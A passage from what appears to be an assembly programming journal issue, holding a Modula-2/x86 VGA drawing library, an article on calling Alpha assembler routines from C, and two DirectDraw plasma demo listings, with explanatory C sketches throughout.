MOV AX, 0A000H
MOV ES, AX (* Set up segment register *)
MOV CX, x
AND CX, 7
MOV BX, 8
SUB BX, CX
MOV AL, 0FFH
SHR AL, CL
MOV Emask, AL (* compose plotting mask *)
MOV CX, dx
SUB CX, BX
MOV AX, CX
AND AX, 7
PUSH AX (* Save L-val *)
SUB CX, AX
SHR CX, 1
SHR CX, 1
SHR CX, 1
MOV Kval, CX
MOV AL, 0
POP CX (* retrieve L-val *)
JCXZ L0
MOV AL, 080H
L0: DEC CX
SAR AL, CL
MOV Lmask, AL
MOV AX, y (* Calculate offset in Video RAM *)
MOV BX, AX
ADD AX, AX
ADD AX, AX
ADD AX, BX (* AX := 5 * Y *)
MOV CL, 4
SHL AX, CL (* AX := 16 * 5 * Y *)
MOV BX, x
SHR BX, 1
SHR BX, 1
SHR BX, 1
ADD BX, AX (* plus X / 8 *)
MOV AH, Emask
MOV DX, 03CEH
MOV AL, 8
OUT DX, AX (* Set plotting mask *)
MOV AL, Val
MOV AH, ES:[BX]
MOV ES:[BX], AL (* Do the plotting ... *)
INC BX
MOV CX, Kval
JCXZ L2
MOV AX, 0FF08H
OUT DX, AX
MOV AH, Val
L1: MOV AL, ES:[BX]
MOV ES:[BX], AH
INC BX
LOOP L1
L2: MOV AH, Lmask
MOV AL, 8
OUT DX, AX
MOV AL, ES:[BX]
MOV AL, Val
MOV ES:[BX], AL
END;
INC (InWin.CurX, dx);
END;
END DrawH;
PROCEDURE PlotChar (VAR InWin : WinData; Letter : CHAR);
(* Plot character on InWin.(CurX,CurY). *)
VAR xpos, ypos, MapOfs, VGApos, VGAseg, Pmask : CARDINAL;
Cval : CHAR;
BEGIN
IF Letter = 0AX THEN
INC (InWin.CurY, 16); (* Process LF *)
RETURN;
END;
IF Letter = 0DX THEN
InWin.CurX := InWin.Indent; (* Process CR *)
RETURN;
END;
IF InWin.CurX >= InWin.Width - ChrWid THEN
InWin.CurX := InWin.Indent;
INC (InWin.CurY, 16);
END;
xpos := InWin.CurX + InWin.TopX;
ypos := InWin.CurY + InWin.TopY;
VGApos := 80 * ypos + SHR (xpos, 3);
VGAseg := 0A000H;
MapOfs := ORD (Letter) * 16;
ASM
PUSH ES (* save ES *)
MOV CX, xpos
AND CX, 7
MOV Cval, CL (* nr of bits "off center" *)
MOV BX, 0FF00H
SHR BX, CL
MOV Pmask, BX (* mask to use for left and right halves *)
MOV AX, BX
MOV AL, 8
MOV DX, 03CEH
OUT DX, AX (* set plotting mask for left part *)
MOV CX, 16
MOV BX, VGApos
LES SI, BitMap (* here are the pixels that make the tokens *)
ADD SI, MapOfs
L0: PUSH CX
LES AX, BitMap (* load ES, AX is just scrap *)
MOV AH, ES:[SI] (* load pattern *)
MOV CL, Cval
SHR AX, CL (* compose left half *)
MOV ES, VGAseg
MOV AL, ES:[BX]
MOV ES:[BX], AH (* and "print" it *)
ADD BX, 80 (* point to next row *)
INC SI (* and next pixel pattern *)
POP CX
LOOP L0 (* repeat until done *)
MOV AX, Pmask
CMP AL, 0 (* if Cval = 0 => perfect alignment *)
JE ex (* skip second half *)
XCHG AH, AL (* else repeat the story once more *)
MOV AL, 8
OUT DX, AX (* set up mask for right half *)
MOV CX, 16
SUB BX, 1279 (* 16 x 80 - 1 *)
SUB SI, CX
L1: PUSH CX
LES AX, BitMap
MOV AH, ES:[SI]
MOV AL, 0
MOV CL, Cval
SHR AX, CL
MOV ES, VGAseg
MOV AH, ES:[BX]
MOV ES:[BX], AL
ADD BX, 80
INC SI
POP CX
LOOP L1
ex: POP ES
END;
INC (InWin.CurX, ChrWid); (* point to next printing position *)
END PlotChar;
---------------------------------------------------------------------------
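The mask arithmetic at the start of the long-line branch of DrawH is easy to
lose among the register shuffling, so here is a C sketch of just that part.
The struct hspan and the function split_hspan are invented for this
illustration; they compute what the listing stores in Emask, Kval and Lmask.

```c
#include <assert.h>
#include <stdint.h>

/* A horizontal run split into: partial first byte, full bytes, partial last. */
typedef struct {
    uint8_t  first_mask;   /* Emask: pixels from x to the end of its byte */
    unsigned full_bytes;   /* Kval : whole bytes written as 0FFh          */
    uint8_t  last_mask;    /* Lmask: leftmost pixels of the final byte    */
} hspan;

hspan split_hspan(unsigned x, unsigned dx)
{
    unsigned lead       = x & 7u;          /* bit position of first pixel  */
    unsigned first_bits = 8u - lead;       /* pixels covered by first byte */
    assert(dx >= first_bits);              /* DrawH only gets here if dx >= 18 */

    unsigned rest = dx - first_bits;       /* pixels left after first byte */
    unsigned tail = rest & 7u;             /* pixels in the last byte      */

    hspan s;
    s.first_mask = (uint8_t)(0xFFu >> lead);
    s.full_bytes = rest >> 3;
    s.last_mask  = (uint8_t)(0xFF00u >> tail);  /* top `tail` bits set     */
    return s;
}
```

For x=5 and dx=20 this gives a first mask of 07h (3 pixels), 2 full bytes
(16 pixels) and a last mask of 080h (1 pixel), 20 pixels in all.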
And here is the promised solution for the "make a box-drawing routine"
problem of the previous issue. OK, the solution is in Modula-2, but since
this is such an easy language to understand, it will be no big deal to port
this code to assembly language.
---------------------------------------------------------------------------
PROCEDURE MakeBox (InWin : WinData);
(* Make a box on screen starting at (TopX, TopY). *)
BEGIN
InWin.CurX := 0;
InWin.CurY := 0; (* Make sure pointers are correct *)
InWin.DeltaX := InWin.Width - 1;
InWin.DeltaY := InWin.Height - 1; (* setup parameters for drawing lines *)
SetColour (InWin.BoxCol);
DrawH (InWin, TRUE); (* draw horizontal line *)
DrawV (InWin); (* draw vertical line *)
InWin.CurX := 0;
InWin.CurY := 1; (* adjust coordinates *)
DrawV (InWin); (* draw last vertical line *)
DEC (InWin.CurY);
INC (InWin.CurX); (* adjust coordinates once more *)
DrawH (InWin, TRUE); (* draw final line *)
END MakeBox;
END VgaLib.
---------------------------------------------------------------------------
::/ \::::::.
:/___\:::::::.
/| \::::::::.
:| _/\:::::::::.
:| _|\ \::::::::::.
:::\_____\:::::::::::...........................................FEATURE.ARTICLE
Assembly on the Alpha Platform
by Rudolf Seemann
ASSEMBLING ON ALPHA PART I
--------------------------
In this first article I will show how to use functions written in Alpha
assembler in a program written in C. The example I give is a rather simple
one. There are many things to know about the Alpha, but this text shows that
it is quite simple to use assembler on it.
Introduction
------------
The heart of the alpha architecture is a 64-bit RISC processor with 32
integer ($0 to $31) and 32 floating point registers ($f0 to $f31). Its
operation codes can be classified by the number of their operands:
class     opcode
operate   opcode Ra,Rb,Rc       # Ra operation Rb -> Rc
          opcode Ra,number,Rc   # Ra operation number (0-255) -> Rc
memory    opcode Ra,Disp(Rb)    # load/store register Ra from/to the
                                # memory address Rb + offset Disp
branch    opcode Ra,label       # branch to label if Ra = true
PAL       opcode number         # opcodes for the operating system
The usage convention of the registers is listed in the following tables.
Saved registers are those whose contents will not be lost if a function is
called: the called function saves such registers if it uses them.
int reg      Usage Convention              Saved
------------------------------------------------
$0           Integer function result       No
$1-$8        Conventional scratch regs     No
$9-$14       General uses                  Yes
$15 or $fp   Frame pointer                 Yes
$16-$21      Integer arguments by value    No
$22-$25      Conventional scratch regs     No
$26          Return address register       Yes
$27          Procedure value (pointer)     No
$28 or $at   reserved for system           No
$29 or $gp   Global pointer                No
$30 or $sp   Stack pointer                 Yes
$31          Zero (not modifiable)         n/a
float reg    Usage Convention                     Saved
-------------------------------------------------------
$f0          floating point function result       No
$f1          Imaginary part function result       No
$f2-$f9      General uses                         Yes
$f10-$f15    Conventional scratch regs            No
$f16-$f21    Floating point args by value         No
$f22-$f30    Conventional scratch regs            No
$f31         Zero (not modifiable)                n/a
Data types are specified by suffixes (like q for quadword, l for longword).
Most integer operations only know these two suffixes. Floating point
operations likewise know two: s and t.
Integer Data types:
Type      Bits  signed range                  unsigned range
---------------------------------------------------------------------
Byte       8    -128 to 127                   0 to 255
Word      16    -32768 to 32767               0 to 65535
Longword  32    -2147483648 to 2147483647     0 to 4294967295
Quadword  64    -9223372036854775808 to       0 to 18446744073709551615
                9223372036854775807
Floating Point Data Types:
Type Magnitude Precision
----------------------------------------------------------------
S-floating 1.175 x 10^-38 to 3.403 x 10^38 6 decimal digits
T-floating 2.225 x 10^-308 to 1.798 x 10^308 15 decimal digits
If you want to use 64-bit numbers in the c-programming language (gcc), use
(long) or (long int). (int) is 32 bits long.
The following example was tested on an SX164 with SuSE Alpha Linux 6.3
(Kernel 2.2.13).
The Example
-----------
My C program calls the assembler function div, which divides the first
argument given to it by the second one. The arguments will be put in the
integer registers $16 and $17 by convention. So all we have to do is to
divide register $16 by $17. The Alpha has no integer division instruction.
There is a pseudo-opcode for integer division, but I will show how to
convert an integer to a floating point number, do the division in the
floating point registers and convert it back to integer. Finally the result
will be put by convention in register $0 where the C program expects it to
be.
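In C terms the assembler routine does roughly what the sketch below does.
The name div_via_double is made up for this illustration. Two caveats, both
assumptions on my part rather than statements about the listing: the C cast
back to integer truncates toward zero, whereas the rounding applied by cvttq
depends on the qualifier it is assembled with, and a T-floating value has a
53-bit mantissa, so operands beyond 2^53 cannot be represented exactly.

```c
#include <assert.h>
#include <stdint.h>

/* Integer division carried out in double precision floating point. */
int64_t div_via_double(int64_t a, int64_t b)
{
    assert(b != 0);                 /* the assembler version does not check */
    double fa = (double)a;          /* cvtqt: integer -> floating point     */
    double fb = (double)b;
    double q  = fa / fb;            /* divt                                 */
    return (int64_t)q;              /* back to integer (truncating in C)    */
}
```

With the values from the example, 1111 divided by 14 yields 79.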
Compiling the source codes
--------------------------
gcc -c div.s
gcc -o div divide.c div.o
Source of the C-program
-----------------------
/* divide.c */
#include <stdio.h>
long int div(long int a, long int b); /* implemented in div.s */
int main()
{
long int a,b,c; /* long int is 64 bits long */
a=1111; /* a random number */
b=14; /* second random number */
c=div(a,b); /* div is a function written in assembler code */
/* div returns the value of a / b */
printf("c is %ld\n",c); /* %ld because c is a long int */
return 0;
}
-------------------------------------------------- cut here
Source of the Assembler-Program: div.s
-------------------------------------------------- cut here
.title div divides two arguments and returns the result
.data # Data section
temp1: .quad 0 # temporary variable
temp2: .quad 0 # temporary variable
temp3: .quad 0 # temporary variable
REGS = 1 # How many registers have to be saved
STACK = REGS # these registers will be put on the stack
FRAME = ((STACK*8+8)/16)*16 # Stack size
.text # text section
.align 4
.set noreorder # disallow rearrangements
.globl div # these 3 lines mark the
.ent div # mandatory function
div: # entry
ldgp $gp,0($27) # load the global pointer
lda $sp,-FRAME($sp) # load the stack pointer
stq $26,0($sp) # save our own exit address
.frame $sp,FRAME,$26,0 # describe the stack frame
.prologue 1
stq $16,temp1 # save register $16 (first argument)
stq $17,temp2 # save register $17 (second argument)
ldt $f2,temp1 # load 1st argument in floating point register
ldt $f3,temp2 # load 2nd argument in floating point register
cvtqt $f2,$f2 # convert integer to floating point
cvtqt $f3,$f3 # convert integer to floating point
divt $f2,$f3,$f4 # $f4 <-- $f2 / $f3
cvttq $f4,$f4 # convert floating point to integer
stt $f4,temp3 # store integer
ldq $0,temp3 # load integer in integer register
done: ldq $26,0($sp) # restore exit address
lda $sp,FRAME($sp) # Restore stack level
ret $31,($26),1 # Back to c-program
.end div # Mark end of function
-------------------------------------------------- cut here
::/ \::::::.
:/___\:::::::.
/| \::::::::.
:| _/\:::::::::.
:| _|\ \::::::::::.
:::\_____\:::::::::::................................WIN32.ASSEMBLY.PROGRAMMING
Direct Draw Examples
by X-Calibre
As a follow-up to the Direct Draw article in APJ#5, here are two complete
DirectDraw sample programs. The first uses an 8-bit palettized display mode,
while the second uses a 32-bit (truecolor) mode. To assemble these, you will
need to obtain Ddraw.inc
( http://asmjournal.freeservers.com/files/Ddraw.inc.html )
for the necessary DirectDraw definitions.
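One difference between the two listings is the byte order of each colour.
Both build a value of the form 00RRGGBBh in EAX; the 8-bit version then
applies BSWAP and SHR 8 before storing it. The C sketch below shows that
shuffle. The function names are invented here, and the reading that the
swapped form matches a red-first palette entry while the unswapped form is
used directly as a 32-bit pixel is my interpretation of the code, not
something the listings state.

```c
#include <assert.h>
#include <stdint.h>

/* Build 00RRGGBBh the way the FOR loop does: shift left 8, OR in next part. */
uint32_t pack_rgb(unsigned r, unsigned g, unsigned b)
{
    assert(r < 256 && g < 256 && b < 256);
    uint32_t v = 0;
    v = (v << 8) | r;
    v = (v << 8) | g;
    v = (v << 8) | b;
    return v;
}

/* Portable equivalent of the x86 BSWAP instruction. */
uint32_t bswap32(uint32_t v)
{
    return (v >> 24) | ((v >> 8) & 0x0000FF00u) |
           ((v << 8) & 0x00FF0000u) | (v << 24);
}

/* bswap eax / shr eax,8 : 00RRGGBBh -> 00BBGGRRh (red in the lowest byte) */
uint32_t to_palette_entry(uint32_t rgb)
{
    return bswap32(rgb) >> 8;
}
```

Stored little-endian, 00BBGGRRh puts red at the lowest address, followed by
green, blue and a zero byte.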
;Ddplasma8.asm_________________________________________________________________
;---------------------------------------;
; DDRAW Plasma Demo ;
; ;
; Author : X-Calibre ;
; ASM version : Ewald Snel ;
; Copyright (C) 1999, Diamond Crew ;
; ;
; http://here.is/diamond/ ;
;---------------------------------------;
TITLE WIN32ASM EXAMPLE
.486
.MODEL FLAT, STDCALL
option casemap :none
;-----------------------------------------------------------;
; WIN32ASM / DDRAW PLASMA DEMO ;
;-----------------------------------------------------------;
INCLUDE \masm32\include\windows.inc
; -----------------------------------
; Note that the following is the
; include file written by Ewald Snel.
; -----------------------------------
INCLUDE \masm32\include\ddraw.inc
INCLUDE \masm32\include\gdi32.inc
INCLUDE \masm32\include\kernel32.inc
INCLUDE \masm32\include\user32.inc
includelib \masm32\lib\gdi32.lib
includelib \masm32\lib\ddraw.lib
includelib \masm32\lib\kernel32.lib
includelib \masm32\lib\user32.lib
WinMain PROTO :DWORD,:DWORD,:DWORD,:DWORD
WndProc PROTO :DWORD,:DWORD,:DWORD,:DWORD
nextFrame PROTO
initPlasma PROTO
RETURN MACRO arg
IFNB <arg>
mov eax, arg
ENDIF
ret
ENDM
LRETURN MACRO arg
IFNB <arg>
mov eax, arg
ENDIF
leave
ret
ENDM
FATAL MACRO msg
LOCAL @@msg
.DATA
@@msg db msg, 0
.CODE
INVOKE MessageBox, hWnd, ADDR @@msg, ADDR szDisplayName, MB_OK
INVOKE ExitProcess, 0
ENDM
.DATA?
hWnd HWND ? ; surface window
lpDD LPDIRECTDRAW ? ; DDraw object
lpDDSPrimary LPDIRECTDRAWSURFACE ? ; DDraw primary surface
ddsd DDSURFACEDESC <?> ; DDraw surface descriptor
ddscaps DDSCAPS <?> ; DDraw capabilities
palette dd 256 dup (?)
table dd 512 dup (?)
lpDDPalette dd ?
.DATA
ddwidth EQU 320 ; display mode width
ddheight EQU 200 ; display mode height
ddbpp EQU 8 ; display mode color depth
phaseA dd 0
phaseB dd 0
factor1 EQU -2
factor2 EQU -1
factor3 EQU 1
factor4 EQU -2
red dd 500.0
green dd 320.0
blue dd 372.0
scale1 dd 2.0
scale2 dd 128.0
scale3 dd 256.0
scale4 dd 127.0
szClassName db "DDRAW Plasma Demo", 0 ; class name
szDisplayName EQU <szClassName> ; window name
color dd 0
wc WNDCLASSEX < SIZEOF WNDCLASSEX, CS_HREDRAW OR CS_VREDRAW,
OFFSET WndProc, 0, 0, , 0, 0, , 0,
OFFSET szClassName,
0 >
.CODE
start:
INVOKE GetModuleHandle, NULL
INVOKE WinMain, eax, NULL, NULL, SW_SHOWDEFAULT
INVOKE ExitProcess, eax
;-----------------------------------------------------------;
; Calculate Next Plasma Frame ;
;-----------------------------------------------------------;
nextFrame PROC
push ebx
push esi
push edi
mov ecx , ddheight ; # of scanlines
mov edi , [ddsd.lpSurface] ; pixel output
@@scanline:
push ecx
push edi
mov esi , [phaseA]
mov edx , [phaseB]
sub esi , ecx
and edx , 0ffH
and esi , 0ffH
mov edx , [table][4*edx][256*4]
mov esi , [table][4*esi] ; [x] + table0[a + y]
sub edx , ecx ; [y] + table1[b]
mov ecx , ddwidth ; [x] --> pixel counter
@@pixel:
and esi , 0ffH
and edx , 0ffH
mov eax , [table][4*esi]
mov ebx , [table][4*edx][256*4]
add eax , ebx
add esi , factor3
shr eax , 1
inc edi
add edx , factor4
dec ecx
mov [edi][-1] , al
jnz @@pixel
pop edi
pop ecx
add edi , [ddsd.lPitch] ; inc. display position
dec ecx
jnz @@scanline
add [phaseA] , factor1
add [phaseB] , factor2
pop edi
pop esi
pop ebx
ret
nextFrame ENDP
;-----------------------------------------------------------;
; Initialize Plasma Tables ;
;-----------------------------------------------------------;
initPlasma PROC
LOCAL @@i :DWORD
LOCAL @@r :DWORD
LOCAL @@g :DWORD
LOCAL @@b :DWORD
LOCAL temp :DWORD
mov [@@i] , 0
.WHILE @@i < 256
mov edx , [@@i]
; Calculate table0 value
fldpi
fimul DWORD PTR [@@i]
fmul REAL4 PTR [scale1]
fdiv REAL4 PTR [scale3]
fsin
fmul REAL4 PTR [scale4]
fadd REAL4 PTR [scale2]
fistp DWORD PTR [table][4*edx]
; Calculate table1 value
fldpi
fimul DWORD PTR [@@i]
fmul REAL4 PTR [scale1]
fdiv REAL4 PTR [scale3]
fcos
fmul REAL4 PTR [scale2]
fadd REAL4 PTR [scale2]
fldpi
fmulp st(1), st
fmul REAL4 PTR [scale1]
fdiv REAL4 PTR [scale3]
fsin
fmul REAL4 PTR [scale4]
fadd REAL4 PTR [scale2]
fistp DWORD PTR [table][4*edx][4*256]
; Calculate palette value
xor eax , eax
FOR comp, <red, green, blue>
fldpi
fimul DWORD PTR [@@i]
fmul REAL4 PTR [scale1]
fdiv REAL4 PTR [comp]
fcos
fmul REAL4 PTR [scale4]
fadd REAL4 PTR [scale2]
fistp DWORD PTR [temp]
shl eax , 8
or eax , [temp]
ENDM
bswap eax
shr eax, 8
mov [palette][4*edx] , eax
inc [@@i]
.ENDW
; Set palette
DDINVOKE CreatePalette, lpDD, DDPCAPS_8BIT or DDPCAPS_ALLOW256, ADDR palette, ADDR lpDDPalette, NULL
.IF eax != DD_OK
FATAL "Couldn't create palette"
.ENDIF
DDSINVOKE SetPalette, lpDDSPrimary, lpDDPalette
.IF eax != DD_OK
FATAL "Couldn't set palette"
.ENDIF
ret
initPlasma ENDP
;-----------------------------------------------------------;
; WinMain ( entry point ) ;
;-----------------------------------------------------------;
WinMain PROC hInst :DWORD,
hPrevInst :DWORD,
CmdLine :DWORD,
CmdShow :DWORD
LOCAL msg :MSG
; Fill WNDCLASSEX structure with required variables
mov eax , [hInst]
mov [wc.hInstance] , eax
INVOKE GetStockObject , BLACK_BRUSH
mov [wc.hbrBackground] , eax
INVOKE RegisterClassEx, ADDR wc
; Create window at following size
INVOKE CreateWindowEx, 0,
ADDR szClassName,
ADDR szDisplayName,
WS_POPUP,
0, 0, ddwidth, ddheight,
NULL, NULL,
hInst, NULL
mov [hWnd] , eax
INVOKE ShowWindow, hWnd, SW_MAXIMIZE
INVOKE SetFocus, hWnd
INVOKE ShowCursor, 0
; Initialize display
INVOKE DirectDrawCreate, NULL, ADDR lpDD, NULL
.IF eax != DD_OK
FATAL "Couldn't init DirectDraw"
.ENDIF
DDINVOKE SetCooperativeLevel, lpDD, hWnd, DDSCL_EXCLUSIVE OR DDSCL_FULLSCREEN
.IF eax != DD_OK
FATAL "Couldn't set DirectDraw cooperative level"
.ENDIF
DDINVOKE SetDisplayMode, lpDD, ddwidth, ddheight, ddbpp
.IF eax != DD_OK
FATAL "Couldn't set display mode"
.ENDIF
mov [ddsd.dwSize] , SIZEOF DDSURFACEDESC
mov [ddsd.dwFlags] , DDSD_CAPS
mov [ddsd.ddsCaps.dwCaps] , DDSCAPS_PRIMARYSURFACE
DDINVOKE CreateSurface, lpDD, ADDR ddsd, ADDR lpDDSPrimary, NULL
.IF eax != DD_OK
FATAL "Couldn't create primary surface"
.ENDIF
call initPlasma
; Loop until PostQuitMessage is sent
.WHILE 1
INVOKE PeekMessage, ADDR msg, NULL, 0, 0, PM_REMOVE
.IF eax != 0
.IF msg.message == WM_QUIT
INVOKE PostQuitMessage, msg.wParam
.BREAK
.ELSE
INVOKE TranslateMessage, ADDR msg
INVOKE DispatchMessage, ADDR msg
.ENDIF
.ELSE
INVOKE GetFocus
.IF eax == hWnd
mov [ddsd.dwSize] , SIZEOF DDSURFACEDESC
mov [ddsd.dwFlags] , DDSD_PITCH
.WHILE 1
DDSINVOKE mLock, lpDDSPrimary, NULL, ADDR ddsd, DDLOCK_WAIT, NULL
.BREAK .IF eax == DD_OK
.IF eax == DDERR_SURFACELOST
DDSINVOKE Restore, lpDDSPrimary
.ELSE
FATAL "Couldn't lock surface"
.ENDIF
.ENDW
DDINVOKE WaitForVerticalBlank, lpDD, DDWAITVB_BLOCKBEGIN, NULL
call nextFrame
DDSINVOKE Unlock, lpDDSPrimary, ddsd.lpSurface
.ENDIF
.ENDIF
.ENDW
.IF lpDD != NULL
.IF lpDDSPrimary != NULL
DDSINVOKE Release, lpDDSPrimary
mov [lpDDSPrimary] , NULL
.ENDIF
DDINVOKE Release, lpDD
mov [lpDD] , NULL
.ENDIF
LRETURN msg.wParam
WinMain ENDP
;-----------------------------------------------------------;
; Window Proc ( handle events ) ;
;-----------------------------------------------------------;
WndProc PROC hWin :DWORD,
uMsg :DWORD,
wParam :DWORD,
lParam :DWORD
.IF uMsg == WM_KEYDOWN
.IF wParam == VK_ESCAPE
INVOKE PostQuitMessage, NULL
RETURN 0
.ENDIF
.ELSEIF uMsg == WM_DESTROY
INVOKE PostQuitMessage, NULL
RETURN 0
.ENDIF
INVOKE DefWindowProc, hWin, uMsg, wParam, lParam
ret
WndProc ENDP
END start
;End_Ddplasma8.asm_____________________________________________________________
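The two nested loops of nextFrame in the 8-bit listing above can be sketched
in C as follows. This is an illustration only: plasma_frame and its
parameters are names invented here, the 512-entry table is assumed to hold
table0 in its first 256 entries and table1 in the second 256 (as the
[256*4] displacement suggests), and the destination is an ordinary byte
buffer rather than a locked DirectDraw surface.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

enum { PLASMA_W = 320, PLASMA_H = 200 };

/* Fill one 8-bit frame; pitch is the distance in bytes between scanlines. */
void plasma_frame(uint8_t *dst, size_t pitch, const uint32_t table[512],
                  uint32_t phase_a, uint32_t phase_b)
{
    assert(dst != NULL && table != NULL && pitch >= PLASMA_W);

    for (uint32_t line = PLASMA_H; line > 0; --line) {   /* ecx counts down */
        uint32_t a = table[(phase_a - line) & 0xFFu];    /* table0[a + y]   */
        uint32_t b = table[256 + (phase_b & 0xFFu)] - line; /* table1[b] - y */

        for (int px = 0; px < PLASMA_W; ++px) {
            a &= 0xFFu;
            b &= 0xFFu;
            /* average of the two table lookups gives the colour index */
            dst[px] = (uint8_t)((table[a] + table[256 + b]) >> 1);
            a += 1;                                      /* factor3 = 1     */
            b -= 2;                                      /* factor4 = -2    */
        }
        dst += pitch;                                    /* next scanline   */
    }
}
```

Between frames the caller would add factor1 (-2) to phase_a and factor2 (-1)
to phase_b, which is what makes the pattern drift.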
;Ddplasma32.asm________________________________________________________________
;---------------------------------------;
; DDRAW Plasma Demo ;
; ;
; Author : X-Calibre ;
; ASM version : Ewald Snel ;
; Copyright (C) 1999, Diamond Crew ;
; ;
; http://here.is/diamond/ ;
;---------------------------------------;
TITLE WIN32ASM EXAMPLE
.386
.MODEL FLAT, STDCALL
option casemap :none
;-----------------------------------------------------------;
; WIN32ASM / DDRAW PLASMA DEMO ;
;-----------------------------------------------------------;
INCLUDE \masm32\include\windows.inc
; -----------------------------------
; Note that the following is the
; include file written by Ewald Snel.
; -----------------------------------
INCLUDE .\ddraw.inc
INCLUDE \masm32\include\gdi32.inc
INCLUDE \masm32\include\kernel32.inc
INCLUDE \masm32\include\user32.inc
includelib \masm32\lib\gdi32.lib
includelib \masm32\lib\ddraw.lib
includelib \masm32\lib\kernel32.lib
includelib \masm32\lib\user32.lib
WinMain PROTO :DWORD,:DWORD,:DWORD,:DWORD
WndProc PROTO :DWORD,:DWORD,:DWORD,:DWORD
nextFrame PROTO
initPlasma PROTO
RETURN MACRO arg
IFNB <arg>
mov eax, arg
ENDIF
ret
ENDM
LRETURN MACRO arg
IFNB <arg>
mov eax, arg
ENDIF
leave
ret
ENDM
FATAL MACRO msg
LOCAL @@msg
.DATA
@@msg db msg, 0
.CODE
INVOKE MessageBox, hWnd, ADDR @@msg, ADDR szDisplayName, MB_OK
INVOKE ExitProcess, 0
ENDM
.DATA?
palette dd 256 dup (?)
table dd 512 dup (?)
hWnd HWND ? ; surface window
lpDD LPDIRECTDRAW ? ; DDraw object
lpDDSPrimary LPDIRECTDRAWSURFACE ? ; DDraw primary surface
ddsd DDSURFACEDESC <?> ; DDraw surface descriptor
ddscaps DDSCAPS <?> ; DDraw capabilities
.DATA
ddwidth EQU 320 ; display mode width
ddheight EQU 200 ; display mode height
ddbpp EQU 32 ; display mode color depth
phaseA dd 0
phaseB dd 0
factor1 EQU -2
factor2 EQU -1
factor3 EQU 1
factor4 EQU -2
red dd 500.0
green dd 320.0
blue dd 372.0
scale1 dd 2.0
scale2 dd 128.0
scale3 dd 256.0
scale4 dd 127.0
szClassName db "DDRAW Plasma Demo", 0 ; class name
szDisplayName EQU <szClassName> ; window name
color dd 0
wc WNDCLASSEX < SIZEOF WNDCLASSEX, CS_HREDRAW OR CS_VREDRAW,
OFFSET WndProc, 0, 0, , 0, 0, , 0,
OFFSET szClassName,
0 >
.CODE
start:
INVOKE GetModuleHandle, NULL
INVOKE WinMain, eax, NULL, NULL, SW_SHOWDEFAULT
INVOKE ExitProcess, eax
;-----------------------------------------------------------;
; Calculate Next Plasma Frame ;
;-----------------------------------------------------------;
nextFrame PROC
push ebx
push esi
push edi
mov ecx , ddheight ; # of scanlines
mov edi , [ddsd.lpSurface] ; pixel output
@@scanline:
push ecx
push edi
mov esi , [phaseA]
mov edx , [phaseB]
sub esi , ecx
and edx , 0ffH
and esi , 0ffH
mov edx , [table][4*edx][256*4]
mov esi , [table][4*esi] ; [x] + table0[a + y]
sub edx , ecx ; [y] + table1[b]
mov ecx , ddwidth ; [x] --> pixel counter
@@pixel:
and esi , 0ffH
and edx , 0ffH
mov eax , [table][4*esi]
mov ebx , [table][4*edx][256*4]
add eax , ebx
add esi , factor3
shr eax , 1
add edx , factor4
and eax , 0ffH
add edi , 4
mov eax , [palette][4*eax]
dec ecx
mov [edi][-4] , eax
jnz @@pixel
pop edi
pop ecx
add edi , [ddsd.lPitch] ; inc. display position
dec ecx
jnz @@scanline
add [phaseA] , factor1
add [phaseB] , factor2
pop edi
pop esi
pop ebx
ret
nextFrame ENDP
;-----------------------------------------------------------;
; Initialize Plasma Tables ;
;-----------------------------------------------------------;
initPlasma PROC
LOCAL @@i :DWORD
LOCAL @@r :DWORD
LOCAL @@g :DWORD
LOCAL @@b :DWORD
LOCAL temp :DWORD
mov [@@i] , 0
.WHILE @@i < 256
mov edx , [@@i]
; Calculate table0 value
fldpi
fimul DWORD PTR [@@i]
fmul REAL4 PTR [scale1]
fdiv REAL4 PTR [scale3]
fsin
fmul REAL4 PTR [scale4]
fadd REAL4 PTR [scale2]
fistp DWORD PTR [table][4*edx]
; Calculate table1 value
fldpi
fimul DWORD PTR [@@i]
fmul REAL4 PTR [scale1]
fdiv REAL4 PTR [scale3]
fcos
fmul REAL4 PTR [scale2]
fadd REAL4 PTR [scale2]
fldpi
fmulp st(1), st
fmul REAL4 PTR [scale1]
fdiv REAL4 PTR [scale3]
fsin
fmul REAL4 PTR [scale4]
fadd REAL4 PTR [scale2]
fistp DWORD PTR [table][4*edx][4*256]
; Calculate palette value
xor eax , eax
FOR comp, <red, green, blue>
fldpi
fimul DWORD PTR [@@i]
fmul REAL4 PTR [scale1]
fdiv REAL4 PTR [comp]
fcos
fmul REAL4 PTR [scale4]
fadd REAL4 PTR [scale2]
fistp DWORD PTR [temp]
shl eax , 8
or eax , [temp]
ENDM
mov [palette][4*edx] , eax
inc [@@i]
.ENDW
ret
initPlasma ENDP
;-----------------------------------------------------------;
; WinMain ( entry point ) ;
;-----------------------------------------------------------;
WinMain PROC hInst :DWORD,
hPrevInst :DWORD,
CmdLine :DWORD,
CmdShow :DWORD
LOCAL msg :MSG
; Fill WNDCLASSEX structure with required variables
mov eax , [hInst]
mov [wc.hInstance] , eax
INVOKE GetStockObject, BLACK_BRUSH
mov [wc.hbrBackground] , eax
INVOKE RegisterClassEx, ADDR wc
; Create window at following size
INVOKE CreateWindowEx, 0,
ADDR szClassName,
ADDR szDisplayName,
WS_POPUP,
0, 0, ddwidth, ddheight,
NULL, NULL,
hInst, NULL
mov [hWnd] , eax
INVOKE ShowWindow, hWnd, SW_MAXIMIZE
INVOKE SetFocus, hWnd
INVOKE ShowCursor, 0
; Initialize display
INVOKE DirectDrawCreate, NULL, ADDR lpDD, NULL
.IF eax != DD_OK
FATAL "Couldn't init DirectDraw"
.ENDIF
DDINVOKE SetCooperativeLevel, lpDD, hWnd, DDSCL_EXCLUSIVE OR DDSCL_FULLSCREEN
.IF eax != DD_OK
FATAL "Couldn't set DirectDraw cooperative level"
.ENDIF
DDINVOKE SetDisplayMode, lpDD, ddwidth, ddheight, ddbpp
.IF eax != DD_OK
FATAL "Couldn't set display mode"
.ENDIF
mov [ddsd.dwSize] , SIZEOF DDSURFACEDESC
mov [ddsd.dwFlags] , DDSD_CAPS
mov [ddsd.ddsCaps.dwCaps] , DDSCAPS_PRIMARYSURFACE
DDINVOKE CreateSurface, lpDD, ADDR ddsd, ADDR lpDDSPrimary, NULL
.IF eax != DD_OK
FATAL "Couldn't create primary surface"
.ENDIF
call initPlasma
; Loop until PostQuitMessage is sent
.WHILE 1
INVOKE PeekMessage, ADDR msg, NULL, 0, 0, PM_REMOVE
.IF eax != 0
.IF msg.message == WM_QUIT
INVOKE PostQuitMessage, msg.wParam
.BREAK
.ELSE
INVOKE TranslateMessage, ADDR msg
INVOKE DispatchMessage, ADDR msg
.ENDIF
.ELSE
